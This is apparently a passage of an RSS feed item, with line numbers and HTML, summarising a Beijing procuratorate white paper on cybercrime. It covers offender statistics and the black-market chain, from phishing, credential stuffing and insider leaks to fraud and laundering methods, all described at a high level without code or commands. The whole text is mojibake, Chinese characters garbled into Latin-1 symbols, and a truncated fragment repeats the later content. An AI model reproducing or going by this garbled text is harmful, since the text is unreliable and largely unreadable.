æä¾›ä¾µå…¥ã€éžæ³•控制计算机信æ¯ç³»ç»Ÿç¨‹åºã€å·¥å…·ã€‚     ä¸Šæ¸¸çŠ¯ç½ªé“¾ä¸æœ‰éƒ¨åˆ†è¡Œä¸ºäººå› 掌æ¡è¾ƒé«˜çš„æŠ€æœ¯è€Œç¼–写程åºã€å‘çŽ°æ¼æ´ž,客观上为下游犯罪æä¾›äº†æŠ€æœ¯å·¥å…·ã€‚ ä¿¡æ¯ä¼ æ’æœåŠ¡è€… æ‰°ä¹±æ— çº¿ç”µé€šè®¯ç®¡ç†ç§©åºè¡Œä¸ºäººé€šè¿‡ä½¿ç”¨â€œä¼ªåŸºç«™â€è®¾å¤‡å‘é€å¸¦æœ‰æœ¨é©¬ç—…毒ã€é’“鱼网站的手机çŸä¿¡,诱使公众点击,以获å–公民个人信æ¯ã€é“¶è¡Œå¡è´¦å·å¯†ç ã€ç¤¾äº¤ç½‘络信æ¯ç‰ï¼Œè¿›è€Œä»Žäº‹ç›—å–银行账户财产ã€ç²¾å‡†è¯ˆéª—ç‰ä¸‹æ¸¸çŠ¯ç½ªè¡Œä¸ºã€‚ 2 䏿¸¸çŠ¯ç½ªäº§ä¸šé“¾åˆ†æž ç½‘ç»œçŠ¯ç½ªé»‘è‰²äº§ä¸šé“¾ä¸æ¸¸çš„目的,是ä¾é 犯罪行为获å–具有å˜çŽ°ä»·å€¼çš„ç”Ÿäº§è¦ç´ ,而生产è¦ç´ 的具体内容和价值å–决于其使用的场景。 社会工程å¦åŠé’“鱼弿”»å‡» 围绕计算机信æ¯ç³»ç»Ÿå®‰å…¨æ”»é˜²æŠ€æœ¯è¡ç”Ÿå‡ºè¯¸å¤šä¸åŒå¦ç§‘,其䏿œ€ä¸ºè‘—å的是社会工程å¦( Social Engineering)。在社会工程å¦åŸºç¡€ä¹‹ä¸Š,结åˆäº†è®¡ç®—机信æ¯ç³»ç»ŸæŠ€æœ¯çš„钓鱼弿”»å‡»,å·²ç»æˆä¸ºè¿‘å¹´æ¥è¿æ³•行为人员常用的伎俩。 撞库 撞库,本质上是利用用户在ä¸åŒåœºæ™¯ä¸å€¾å‘使用åŒä¸€è´¦æˆ·ä¸Žå¯†ç çš„è¡Œä¸ºä¹ æƒ¯ï¼Œä»¥æ³„éœ²çš„ç”¨æˆ·èº«ä»½è®¤è¯ä¿¡æ¯ä¸ºæ•°æ®æ ·æœ¬,通过计算机信æ¯ç³»ç»Ÿç¨‹åºæ‰¹é‡çš„å°è¯•登陆他方网站的一ç§çŠ¯ç½ªæ‰‹æ®µ,ç›¸è¾ƒäºŽä¼ ç»Ÿçš„å¯†ç 穷举方法更为高效,æ˜¯é»‘è‰²äº§ä¸šé“¾ä¸æ¸¸ä¸æœ€ä¸ºé‡è¦ä¹Ÿæ˜¯æœ€ä¸ºå¸¸è§çš„一ç§çŠ¯ç½ªå½¢æ€ã€‚ 内部人员作案 内外部人员勾结作案,å·²ç»æˆä¸ºä¸æ¸¸é»‘äº§å®žæ–½è¿æ³•çŠ¯ç½ªè¡Œä¸ºçš„å¸¸è§æ¨¡å¼ã€‚å› å†…éƒ¨äººå‘˜ç›¸è¾ƒäºŽå¤–éƒ¨äººå‘˜,往往具有更高的内部æƒé™,了解更多有助于实施犯罪行为信æ¯,天然具有适宜的犯罪机会,犯罪行为更éšè”½,æˆæœ¬æ›´ä½Ž,影哿›´ä¸ºä¸¥é‡ã€‚内部人员往往与外部人员尤其是黑产组织勾结,éžæ³•获å–ä¼ä¸šè®¡ç®—机信æ¯ç³»ç»ŸæŽ§åˆ¶æƒã€‚ 或者内部人员出于利益,éžæ³•出售ä¼ä¸šä¿å˜çš„计算机信æ¯ç³»ç»Ÿæ•°æ®ã€‚ å®‰å…¨æ¼æ´žæŒ–掘 å®‰å…¨æ¼æ´žæŒ–掘是指通过技术手段å‘现计算机信æ¯ç³»ç»Ÿå˜åœ¨çš„ã€å…·æœ‰åˆ©ç”¨ä»·å€¼çš„安全缺陷。 è¿æ³•行为人å¯ä»¥é€šè¿‡å¯¹è®¡ç®—机信æ¯ç³»ç»Ÿå®‰å…¨æ¼æ´žè¿›è¡Œæ”»å‡»,绕过安全防范机制,ä¸Šä¼ æœ¨é©¬ã€ç—…毒ç‰ç ´å性计算机程åº,è¾¾åˆ°æŽ§åˆ¶ç›®æ ‡è®¡ç®—æœºä¿¡æ¯ç³»ç»Ÿçš„目的。 支付场景ä¸çš„å®‰å…¨æ¼æ´žå¯èƒ½ä¼šå¯¼è‡´è¢«å®³æ–¹çš„ç›´æŽ¥ç»æµŽæŸå¤±ã€‚ ç¡¬ä»¶è®¾å¤‡çš„å®‰å…¨æ¼æ´žï¼Œå¯èƒ½ç›´æŽ¥å¨èƒå…¬æ°‘的个人信æ¯çš„安全,å…¶ä¸å…·æœ‰ä»£è¡¨æ„义的是家åºè·¯ç”±å™¨ä¸Žæ™ºèƒ½æ‘„åƒå¤´ã€‚ 3 ä¸‹æ¸¸çŠ¯ç½ªäº§ä¸šé“¾åˆ†æž ä¾µçŠ¯å…¬æ°‘ä¸ªäººä¿¡æ¯ å…¬æ°‘ä¸ªäººä¿¡æ¯ä½œä¸ºäº’è”网信æ¯è½åœ°çš„关键一环,æˆä¸ºçŠ¯ç½ªåˆ†å觊觎的对象。实践ä¸å¤šä»¥é»‘客攻击ã€å†…部人员泄露ç‰å½¢å¼å˜åœ¨ã€‚ 电信网络诈骗 电信网络诈骗犯罪涉åŠè¯ˆéª—罪ã€ä¿¡ç”¨å¡è¯ˆéª—ç‰ç½ªå,主è¦åŒ…括以下两ç§ç±»åž‹ï¼š é€šè¿‡ä¸Šæ¸¸é’“é±¼ç½‘ç«™ã€æœ¨é©¬ç—…毒获å–银行账å·ã€å¯†ç ç‰è´¢äº§ä¿¡æ¯ï¼›é€šè¿‡ä¸æ¸¸çš„æ•°æ®æœåŠ¡å•†æ¸…æ´—å¹¶è½¬å–;下游犯罪行为人使用该账å·å’Œå¯†ç ç›—å–账户ä¸çš„å˜æ¬¾ã€‚ 行为人通过上ã€ä¸æ¸¸çš„犯罪行为或数æ®å¹³å°èŽ·å–了精确的公民个人信æ¯,如姓åã€èŒä¸šã€ç”µè¯å·ç ã€èº«ä»½è¯ä¿¡æ¯ç‰ä¿¡æ¯,通过打电è¯çš„æ–¹å¼è¿›è¡Œç²¾å‡†è¯ˆéª—。 在电信网络诈骗犯罪案件ä¸,为逃é¿é’±æ¬¾è¢«è¿½è¸ª,诈骗行为的下游已ç»å½¢æˆäº†ä¸€ä¸ªä¸“门洗钱端。 行为人使用自己或者他人的身份è¯åŠžç†å¤šå¼ 银行å¡,æä¾›ç»™è¯ˆéª—犯罪集团用于洗钱。 诈骗行为人在进行电è¯è¯ˆéª—时将骗å–的钱款直接投注到彩票站è´ä¹°å½©ç¥¨,éšåŽå°†å½©ç¥¨è¿”款打入自己所控制的账å·ã€‚ 行为人使用他人的银行å¡è´¦æˆ·åŠžç†ç§»åЍPOS机,ä¸“ä¸ºä»–äººå–æ¬¾ã€‚ 刷å•诈骗 ä¼ä¸šåœ¨å¯¹æ——下产å“进行推广时,常采å–补贴ã€å¥–励的机制获å–用户。在下游产业链ä¸å‡ºçŽ°äº†åˆ©ç”¨ä¼ä¸šçš„奖励机制而专门进行批é‡ä¸‹è½½ã€æ³¨å†Œäº§å“,以骗å–ä¼ä¸šè¡¥è´´çš„行为。 敲诈勒索 行为人通常采å–ä¸¤ç§æ–¹å¼è¿›è¡Œæ•²è¯ˆå‹’ç´¢ã€‚ä¸€ç§æ˜¯é€šè¿‡â€œåƒµå°¸ç½‘络â€ä¹Ÿå°±æ˜¯ä¿—称的“肉鸡â€è¿›è¡Œç½‘络攻击;å¦ä¸€ç§æ˜¯é€šè¿‡ä¾µå…¥å…¬å¸æœåŠ¡å™¨çªƒå–å…¬å¸è¿è¥èµ„料从而敲诈勒索被害å•ä½ã€‚ åˆ©ç”¨å……å€¼ç³»ç»Ÿæ¼æ´žå……值 éšç€â€œäº’è”网+â€ã€ä¿¡æ¯åŒ–建设的å‘展,具有公共æœåŠ¡èŒèƒ½çš„æ”¿åºœä¿¡æ¯ç³»ç»Ÿã€äº’è”网消费平å°ç‰å¼€å§‹è®¾ç½®å…·æœ‰ä¸€å®šå‚¨å€¼åŠŸèƒ½çš„å¹³å°,ç”±äºŽç³»ç»Ÿæœ¬èº«çš„æ¼æ´žæˆ–维护ä¸åŠæ—¶ç‰åŽŸå› ,给了犯罪分å以å¯ä¹˜ä¹‹æœºã€‚ 五   ç½‘ç»œåŒ–çš„ä¼ ç»ŸçŠ¯ç½ª éšç€äº’è”网应用场景和互è”网技术的普åŠ,ä¼ ç»ŸçŠ¯ç½ªä¸Žç½‘ç»œå¹³å°ã€ç½‘络技术相结åˆ,开始出现了赌åšã€è´©æ¯’ã€è‰²æƒ…ç‰ä¼ 统犯罪å‘ç½‘ç»œç¤¾ä¼šçš„å»¶ä¼¸å’Œæ‰©å¼ çš„çŽ°è±¡ï¼Œè¡ç”Ÿå‡ºç½‘络赌åšã€ç½‘络色情ã€è´©å–毒å“ã€äº’è”网金èžè¯ˆéª—ç‰çŠ¯ç½ª,并出现从PC端å‘移动互è”端蔓延的趋势。 1 ä¼ æ’æ·«ç§½ç‰©å“ 微信群ç‰ç¤¾äº¤å·¥å…·çš„å‘展大大æé«˜äº†ä¿¡æ¯ä¼ æ’的效率,由于信æ¯é‡å·¨å¤§,监管难度高,导致淫秽信æ¯åœ¨ç½‘络空间泛滥。 […]]]></description>
1803 <content:encoded><![CDATA[<p style="text-align: justify;"><b style="color: rgb(0, 176, 80);">上个月,北京市海淀区人民检察院å‘å¸ƒäº†ã€Šç½‘ç»œå®‰å…¨åˆ‘äº‹å¸æ³•ä¿æŠ¤ç™½çš®ä¹¦ã€‹ã€‚</b></p>
1804<p style="text-align: justify;"><img alt="2018-07-12 110125.jpg" src="http://image.3001.net/images/20180719/15319932858474.jpg!small" width="690" height="451"></p>
1805<p style="text-align: justify;">ã€Šç™½çš®ä¹¦ã€‹æ ¹æ®æµ·æ·€æ£€å¯Ÿé™¢2016å¹´9月以æ¥å—ç†çš„450èµ·ç½‘ç»œçŠ¯ç½ªæ¡ˆä»¶ï¼Œä»Žå¸æ³•的角度,结åˆå…·ä½“æ¡ˆä¾‹ï¼Œæ€»ç»“äº†æˆ‘å›½è¿‘å‡ å¹´æ¥äº’è”网黑产行业的现状。</p>
1806<p><img alt="æ£€å¯Ÿé™¢å¸æ³•ä¿æŠ¤ç™½çš®ä¹¦2.png" src="http://image.3001.net/images/20180719/15319933048986.png!small" width="690" height="389"></p>
1807<p style="text-align: center;">《白皮书》æ€ç»´å¯¼å›¾ï¼Œç‚¹å‡»å›¾ç‰‡å¯æŸ¥çœ‹å¤§å›¾</p>
1808<h2><strong>ä¸€ã€æ¡ˆä»¶åŸºæœ¬æƒ…况</strong></h2>
1809<p style="text-align: justify;">2016å¹´9月以æ¥,北京市海淀区人民检察院å—ç†ç½‘络犯罪案件450件(1076人),å…¶ä¸å®¡æŸ¥é€®æ•245件(588人),审查起诉205件(488人),涉åŠ27个罪å。</p>
1810<p style="text-align: center;"><b><img alt="微信图片_20180719145701.jpg" src="http://image.3001.net/images/20180719/15319933194946.jpg!small" width="402" height="465"></b>å„ç±»åž‹çŠ¯ç½ªå æ¯”</p>
1811</p>
1812<h2><strong>äºŒã€æ¡ˆä»¶ç‰¹å¾</strong></h2>
1813</p>
1814<h3>1 低龄ã€ä½Žå¦åŽ†åŒ–</h3>
1815</p>
1816<p style="text-align: justify;">犯罪主体呈现低龄ã€ä½Žå¦åŽ†åŒ–ç‰¹å¾ã€‚</p>
1817<p>犯罪普é呈现年轻低龄化:</p>
1818<blockquote><p>1990å¹´-1999年出生的221人,å æ¯”37.58%ï¼›</p>
1819<p>1980å¹´-1989年出生283人,å æ¯”A812%ï¼›</p>
1820<p>1970年以å‰å‡ºç”Ÿäººæ•°ä»…å 14.11%。 </p>
1821</blockquote>
1822<p>犯罪的行为人普éå¦åŽ†è¾ƒä½Žï¼š</p>
1823<blockquote><p>本科åŠå…¶ä»¥ä¸Šå¦åކ82人,ä»…å 21%ï¼›</p>
1824<p>高ä¸ã€é«˜èŒæ•™è‚²ä¸»ä½“68人,åˆä¸ã€ä¸ä¸“ã€å°å¦ç‰æ•™è‚²ä¸»ä½“242人,å 62.5%。</p>
1825<p>男性主体å 较大比é‡,审查起诉案件ä¸ç”·æ€§379人,å æ¯”77.66%。</p>
1826</blockquote>
1827<h3>2 跨地域作案</h3>
1828</p>
1829<p style="text-align: justify;">çªç ´äº†ä¼ 统地域空间的é™åˆ¶,è·¨åœ°åŸŸä½œæ¡ˆç‰¹å¾æ˜Žæ˜¾ã€‚作案地点涵盖全国28个çœã€å¸‚ã€è‡ªæ²»åŒºã€‚</p>
1830<blockquote><p>一是犯罪行为实施地和犯罪结果地之间跨地域。</p>
1831<p>二是犯罪主体之间跨地域。</p>
1832<p>三是掩饰ã€éšçž’赃物跨区域。</p>
1833</blockquote>
1834<h3>3 产业化</h3>
1835</p>
1836<p style="text-align: justify;">犯罪行为产业化,æ—¥æ¸å½¢æˆå®Œæ•´ã€é—åˆçš„产业链æ¡ã€‚è¾ƒä¹‹äºŽä¼ ç»ŸçŠ¯ç½ª,网络犯罪的产业化链æ¡ç‰¹å¾æ˜Žæ˜¾,产业链的上ã€ä¸ã€ä¸‹æ¸¸çŠ¯ç½ªåˆ†å·¥æ˜Žç¡®ã€‚</p>
1837</p>
1838<h3>4 组织化</h3>
1839</p>
1840<p>犯罪组织多以公å¸ã€é›†å›¢çš„å½¢æ€å‡ºçŽ°ã€‚ä»¥æ³¨å†Œå…¬å¸å½¢å¼,æœ‰ç»„ç»‡ã€æœ‰è§„模地实施犯罪行为。</p>
1841</p>
1842<h3>5 范围广</h3>
1843</p>
1844<p>å—害人数多,犯罪数é¢å¤§,å½±å“范围广。</p>
1845</p>
1846<h3>6 å…¨çƒåŒ–</h3>
1847</p>
1848<p style="text-align: justify;">跨国犯罪趋势增强,å…¨çƒåŒ–ç‰¹å¾æ˜Žæ˜¾ã€‚ </p>
1849</p>
1850<h2><strong>ä¸‰ã€æ¡ˆä»¶ç±»åž‹</strong></h2>
1851</p>
1852<p style="text-align: justify;">网络空间å‘ç”Ÿçš„è¿æ³•犯罪行为,既有å¯èƒ½æ˜¯åˆ©ç”¨ç½‘ç»œå®žæ–½çš„ä¼ ç»Ÿè¿æ³•犯罪,也å¯èƒ½æ˜¯é’ˆå¯¹ç½‘ç»œã€æ•°æ®æœ¬èº«çš„è¿æ³•çŠ¯ç½ªè¡Œä¸ºã€‚æœ¬æ–‡å°†ç½‘ç»œçŠ¯ç½ªåˆ†ä¸ºï¼šç½‘ç»œé»‘äº§çŠ¯ç½ªå’Œç½‘ç»œåŒ–çš„ä¼ ç»ŸçŠ¯ç½ªã€‚</p>
1853<blockquote><p>网络黑产犯罪以计算机数æ®ã€ç¨‹åºç³»ç»Ÿæˆ–者软件ç‰ä½œä¸ºçŠ¯ç½ªå¯¹è±¡,å½¢æˆäº†ä¸€æ¡å°é—的产业链。上游æä¾›å·¥å…·å’Œå¹³å°ï¼Œä¸æ¸¸èŽ·å–ä¿¡æ¯ã€æ¸…æ´—æ•°æ®,下游精准诈骗产ã€ç›—窃财产,呈现产业化ã€å…¬å¸åŒ–ã€å¹³å°åŒ–的特å¾ï¼Œå¤§å¤§é™ä½Žäº†çŠ¯ç½ªæˆæœ¬,æé«˜äº†çŠ¯ç½ªæ•ˆçŽ‡ã€‚å®žè·µä¸æ¤ç±»æ¡ˆä»¶ä»¥ç ´å计算机信æ¯ç³»ç»Ÿç½ªã€éžæ³•获å–计算机信æ¯ç³»ç»Ÿæ•°æ®ç½ªã€ä¾µçŠ¯å…¬æ°‘ä¸ªäººä¿¡æ¯ç½ªä¸ºä¸»ã€‚</p>
1854<p>ä¼ ç»ŸçŠ¯ç½ªçš„ç½‘ç»œåŒ–,æ˜¯çŽ°å®žçš„çŠ¯ç½ªä¸»ä½“åˆ©ç”¨ä¿¡æ¯æŠ€æœ¯åœ¨ç½‘ç»œç©ºé—´å®žæ–½çš„çŠ¯ç½ªè¡Œä¸º,æ²¡æœ‰åˆ›è®¾æ–°çš„æ³•å¾‹å…³ç³»ã€‚ç½‘ç»œç©ºé—´åªæ˜¯çŠ¯ç½ªçš„è½½ä½“,è®¡ç®—æœºåªæ˜¯è¾…åŠ©æ‰‹æ®µã€‚å¦‚è½¬ç§»åˆ°çº¿ä¸Šçš„éžæ³•叿”¶å…¬ä¼—å˜æ¬¾ã€é›†èµ„诈骗ç‰çŠ¯ç½ªã€‚æ¤å¤–,ä¼ æ’æ·«ç§½ç‰©å“牟利罪ã€å¼€è®¾èµŒåœºç½ªç‰ä¼ 统犯罪也日æ¸å¤šå‘,呈现出新的特点。</p>
1855</blockquote>
1856<h2><strong>å››ã€ç½‘络黑产犯罪</strong></h2>
1857</p>
1858<p style="text-align: justify;">网络黑产已ç»ä»ŽåŽŸå§‹ç²—æ”¾çš„ä¼ æ’æœ¨é©¬ç—…毒ã€ç”µè¯è¯ˆéª—转化为更为先进的拖库撞库ã€ç²¾å‡†è¯ˆéª—,å½¢æˆå分æˆç†Ÿçš„è¿ä½œæ¨¡å¼,äº§ä¸šé“¾å¤æ‚ã€éšè”½ã€å®Œæ•´ã€é«˜æ•ˆã€‚</p>
1859</p>
1860<blockquote><p style="text-align: justify;">上游技术供应商,承担ç€åˆ¶ä½œæœ¨é©¬ã€æ¶æ„代ç 肉鸡网络ã€åЍæ€ipéžæ³•æœåŠ¡ç‰æŠ€æœ¯å·¥å…·æœåŠ¡;</p>
1861</p>
1862<p style="text-align: justify;">䏿¸¸æ•°æ®æœåС商ã€é»‘市交易平å°,在产业链ä¸å……当数æ®ç”Ÿäº§è€…和交易æœåŠ¡æä¾›è€…的角色;</p>
1863</p>
1864<p style="text-align: justify;">ä¸‹æ¸¸è¡Œä¸ºäººåˆ©ç”¨ä¸æ¸¸çš„æ•°æ®å’Œå¹³å°å®žçŽ°ç›´æŽ¥è¯ˆéª—ã€â€œè–…羊毛â€ã€æµé‡åŠ«æŒç‰çŠ¯ç½ªã€‚</p>
1865</blockquote>
1866<p style="text-align: justify;">在该产业链ä¸,基于行为人目的的ä¸åŒ,上ã€ä¸ã€ä¸‹æ¸¸å¯ä»¥ä»»æ„组åˆ,å½¢æˆå…¸åž‹æˆ–éžå…¸åž‹çš„网络黑产犯罪。</p>
1867</p>
1868<h3>1 上游犯罪产业链分æž</h3>
1869</p>
1870<p style="text-align: justify;">上游犯罪的出现是网络黑产产业化的体现。</p>
1871</p>
1872<p style="text-align: justify;"><strong>ç½‘ç»œå¹³å°æä¾›è€…</strong></p>
1873</p>
1874<p style="text-align: justify;">éžæ³•利用信æ¯ç½‘络。</p>
1875<blockquote><p>ä¸ºå®žæ–½çŠ¯ç½ªè€Œä¸“é—¨æž¶è®¾éžæ³•网站,多数用于实施“钓鱼诈骗â€,属于电信诈骗犯罪ä¸ä¸å¯æˆ–缺的关键环节。</p>
1876<p>专门黑客类网站æˆä¸ºçŠ¯ç½ªæ–¹æ³•ã€çŠ¯ç½ªå·¥å…·ã€è¿æ³•ä¿¡æ¯çš„呿ºåœ°ã€‚</p>
1877<p>QQ群ã€å¾®ä¿¡ç¾¤ç‰é€šè®¯ç¾¤ç»„便—§æ˜¯è¿æ³•ä¿¡æ¯äº¤æ˜“ã€äº¤æ¢çš„ä¸»è¦æ¸ é“ã€‚å¤šæ•°è¿æ³•行为人倾å‘选择使用第三方支付æœåС平å°è¿›è¡Œèµ„金结算,而网络æœåŠ¡æä¾›è€…对公民个人éšç§ä¿æŠ¤å’Œä¾¦æŸ¥æœºå…³å–è¯éœ€æ±‚之间的矛盾日益凸显。</p>
1878</blockquote>
1879<p style="text-align: justify;"><strong>技术工具æä¾›è€…</strong></p>
1880</p>
1881<p style="text-align: justify;">æä¾›ä¾µå…¥ã€éžæ³•控制计算机信æ¯ç³»ç»Ÿç¨‹åºã€å·¥å…·ã€‚ </p>
1882</p>
1883<p style="text-align: justify;">ä¸Šæ¸¸çŠ¯ç½ªé“¾ä¸æœ‰éƒ¨åˆ†è¡Œä¸ºäººå› 掌æ¡è¾ƒé«˜çš„æŠ€æœ¯è€Œç¼–写程åºã€å‘çŽ°æ¼æ´ž,客观上为下游犯罪æä¾›äº†æŠ€æœ¯å·¥å…·ã€‚</p>
1884</p>
1885<p style="text-align: justify;"><strong>ä¿¡æ¯ä¼ æ’æœåŠ¡è€…</strong></p>
1886</p>
1887<p style="text-align: justify;">æ‰°ä¹±æ— çº¿ç”µé€šè®¯ç®¡ç†ç§©åºè¡Œä¸ºäººé€šè¿‡ä½¿ç”¨â€œä¼ªåŸºç«™â€è®¾å¤‡å‘é€å¸¦æœ‰æœ¨é©¬ç—…毒ã€é’“鱼网站的手机çŸä¿¡,诱使公众点击,以获å–公民个人信æ¯ã€é“¶è¡Œå¡è´¦å·å¯†ç ã€ç¤¾äº¤ç½‘络信æ¯ç‰ï¼Œè¿›è€Œä»Žäº‹ç›—å–银行账户财产ã€ç²¾å‡†è¯ˆéª—ç‰ä¸‹æ¸¸çŠ¯ç½ªè¡Œä¸ºã€‚</p>
1888</p>
1889<h3>2 䏿¸¸çŠ¯ç½ªäº§ä¸šé“¾åˆ†æž</h3>
1890</p>
1891<p style="text-align: justify;">ç½‘ç»œçŠ¯ç½ªé»‘è‰²äº§ä¸šé“¾ä¸æ¸¸çš„目的,是ä¾é 犯罪行为获å–具有å˜çŽ°ä»·å€¼çš„ç”Ÿäº§è¦ç´ ,而生产è¦ç´ 的具体内容和价值å–决于其使用的场景。</p>
1892</p>
1893<p style="text-align: justify;"><strong>社会工程å¦åŠé’“鱼弿”»å‡»</strong></p>
1894</p>
1895<p style="text-align: justify;">围绕计算机信æ¯ç³»ç»Ÿå®‰å…¨æ”»é˜²æŠ€æœ¯è¡ç”Ÿå‡ºè¯¸å¤šä¸åŒå¦ç§‘,其䏿œ€ä¸ºè‘—å的是社会工程å¦( Social Engineering)。在社会工程å¦åŸºç¡€ä¹‹ä¸Š,结åˆäº†è®¡ç®—机信æ¯ç³»ç»ŸæŠ€æœ¯çš„钓鱼弿”»å‡»,å·²ç»æˆä¸ºè¿‘å¹´æ¥è¿æ³•行为人员常用的伎俩。</p>
1896</p>
1897<p style="text-align: justify;"><strong>撞库</strong></p>
1898</p>
1899<p style="text-align: justify;">撞库,本质上是利用用户在ä¸åŒåœºæ™¯ä¸å€¾å‘使用åŒä¸€è´¦æˆ·ä¸Žå¯†ç çš„è¡Œä¸ºä¹ æƒ¯ï¼Œä»¥æ³„éœ²çš„ç”¨æˆ·èº«ä»½è®¤è¯ä¿¡æ¯ä¸ºæ•°æ®æ ·æœ¬,通过计算机信æ¯ç³»ç»Ÿç¨‹åºæ‰¹é‡çš„å°è¯•登陆他方网站的一ç§çŠ¯ç½ªæ‰‹æ®µ,ç›¸è¾ƒäºŽä¼ ç»Ÿçš„å¯†ç 穷举方法更为高效,æ˜¯é»‘è‰²äº§ä¸šé“¾ä¸æ¸¸ä¸æœ€ä¸ºé‡è¦ä¹Ÿæ˜¯æœ€ä¸ºå¸¸è§çš„一ç§çŠ¯ç½ªå½¢æ€ã€‚</p>
1900</p>
1901<p style="text-align: justify;"><strong>内部人员作案</strong></p>
1902</p>
1903<p style="text-align: justify;">内外部人员勾结作案,å·²ç»æˆä¸ºä¸æ¸¸é»‘äº§å®žæ–½è¿æ³•çŠ¯ç½ªè¡Œä¸ºçš„å¸¸è§æ¨¡å¼ã€‚å› å†…éƒ¨äººå‘˜ç›¸è¾ƒäºŽå¤–éƒ¨äººå‘˜,往往具有更高的内部æƒé™,了解更多有助于实施犯罪行为信æ¯,天然具有适宜的犯罪机会,犯罪行为更éšè”½,æˆæœ¬æ›´ä½Ž,影哿›´ä¸ºä¸¥é‡ã€‚内部人员往往与外部人员尤其是黑产组织勾结,éžæ³•获å–ä¼ä¸šè®¡ç®—机信æ¯ç³»ç»ŸæŽ§åˆ¶æƒã€‚</p>
1904</p>
1905<p style="text-align: justify;">或者内部人员出于利益,éžæ³•出售ä¼ä¸šä¿å˜çš„计算机信æ¯ç³»ç»Ÿæ•°æ®ã€‚</p>
1906</p>
1907<p style="text-align: justify;"><strong>å®‰å…¨æ¼æ´žæŒ–掘</strong></p>
1908</p>
1909<p style="text-align: justify;">å®‰å…¨æ¼æ´žæŒ–掘是指通过技术手段å‘现计算机信æ¯ç³»ç»Ÿå˜åœ¨çš„ã€å…·æœ‰åˆ©ç”¨ä»·å€¼çš„安全缺陷。</p>
1910<blockquote><p>è¿æ³•行为人å¯ä»¥é€šè¿‡å¯¹è®¡ç®—机信æ¯ç³»ç»Ÿå®‰å…¨æ¼æ´žè¿›è¡Œæ”»å‡»,绕过安全防范机制,ä¸Šä¼ æœ¨é©¬ã€ç—…毒ç‰ç ´å性计算机程åº,è¾¾åˆ°æŽ§åˆ¶ç›®æ ‡è®¡ç®—æœºä¿¡æ¯ç³»ç»Ÿçš„目的。</p>
1911<p>支付场景ä¸çš„å®‰å…¨æ¼æ´žå¯èƒ½ä¼šå¯¼è‡´è¢«å®³æ–¹çš„ç›´æŽ¥ç»æµŽæŸå¤±ã€‚</p>
1912<p>ç¡¬ä»¶è®¾å¤‡çš„å®‰å…¨æ¼æ´žï¼Œå¯èƒ½ç›´æŽ¥å¨èƒå…¬æ°‘的个人信æ¯çš„安全,å…¶ä¸å…·æœ‰ä»£è¡¨æ„义的是家åºè·¯ç”±å™¨ä¸Žæ™ºèƒ½æ‘„åƒå¤´ã€‚</p>
1913</blockquote>
1914<h3>3 下游犯罪产业链分æž</h3>
1915</p>
1916<p style="text-align: justify;"><strong>侵犯公民个人信æ¯</strong></p>
1917</p>
1918<p style="text-align: justify;">公民个人信æ¯ä½œä¸ºäº’è”网信æ¯è½åœ°çš„关键一环,æˆä¸ºçŠ¯ç½ªåˆ†å觊觎的对象。实践ä¸å¤šä»¥é»‘客攻击ã€å†…部人员泄露ç‰å½¢å¼å˜åœ¨ã€‚</p>
1919</p>
1920<p style="text-align: justify;"><strong>电信网络诈骗</strong></p>
1921</p>
1922<p style="text-align: justify;">电信网络诈骗犯罪涉åŠè¯ˆéª—罪ã€ä¿¡ç”¨å¡è¯ˆéª—ç‰ç½ªå,主è¦åŒ…括以下两ç§ç±»åž‹ï¼š</p>
1923<blockquote><p>é€šè¿‡ä¸Šæ¸¸é’“é±¼ç½‘ç«™ã€æœ¨é©¬ç—…毒获å–银行账å·ã€å¯†ç ç‰è´¢äº§ä¿¡æ¯ï¼›é€šè¿‡ä¸æ¸¸çš„æ•°æ®æœåŠ¡å•†æ¸…æ´—å¹¶è½¬å–;下游犯罪行为人使用该账å·å’Œå¯†ç ç›—å–账户ä¸çš„å˜æ¬¾ã€‚</p>
1924<p>行为人通过上ã€ä¸æ¸¸çš„犯罪行为或数æ®å¹³å°èŽ·å–了精确的公民个人信æ¯,如姓åã€èŒä¸šã€ç”µè¯å·ç ã€èº«ä»½è¯ä¿¡æ¯ç‰ä¿¡æ¯,通过打电è¯çš„æ–¹å¼è¿›è¡Œç²¾å‡†è¯ˆéª—。</p>
1925</blockquote>
1926<p>在电信网络诈骗犯罪案件ä¸,为逃é¿é’±æ¬¾è¢«è¿½è¸ª,诈骗行为的下游已ç»å½¢æˆäº†ä¸€ä¸ªä¸“门洗钱端。</p>
1927<blockquote><p>行为人使用自己或者他人的身份è¯åŠžç†å¤šå¼ 银行å¡,æä¾›ç»™è¯ˆéª—犯罪集团用于洗钱。</p>
1928<p>诈骗行为人在进行电è¯è¯ˆéª—时将骗å–的钱款直接投注到彩票站è´ä¹°å½©ç¥¨,éšåŽå°†å½©ç¥¨è¿”款打入自己所控制的账å·ã€‚</p>
1929<p>行为人使用他人的银行å¡è´¦æˆ·åŠžç†ç§»åЍPOS机,ä¸“ä¸ºä»–äººå–æ¬¾ã€‚</p>
1930</blockquote>
1931<p style="text-align: justify;"><strong>刷å•诈骗</strong></p>
1932</p>
1933<p style="text-align: justify;">ä¼ä¸šåœ¨å¯¹æ——下产å“进行推广时,常采å–补贴ã€å¥–励的机制获å–用户。在下游产业链ä¸å‡ºçŽ°äº†åˆ©ç”¨ä¼ä¸šçš„奖励机制而专门进行批é‡ä¸‹è½½ã€æ³¨å†Œäº§å“,以骗å–ä¼ä¸šè¡¥è´´çš„行为。</p>
1934</p>
1935<p style="text-align: justify;"><strong>敲诈勒索</strong></p>
1936</p>
1937<p style="text-align: justify;">行为人通常采å–ä¸¤ç§æ–¹å¼è¿›è¡Œæ•²è¯ˆå‹’ç´¢ã€‚ä¸€ç§æ˜¯é€šè¿‡â€œåƒµå°¸ç½‘络â€ä¹Ÿå°±æ˜¯ä¿—称的“肉鸡â€è¿›è¡Œç½‘络攻击;å¦ä¸€ç§æ˜¯é€šè¿‡ä¾µå…¥å…¬å¸æœåŠ¡å™¨çªƒå–å…¬å¸è¿è¥èµ„料从而敲诈勒索被害å•ä½ã€‚</p>
1938</p>
1939<p style="text-align: justify;"><strong>åˆ©ç”¨å……å€¼ç³»ç»Ÿæ¼æ´žå……值</strong></p>
1940</p>
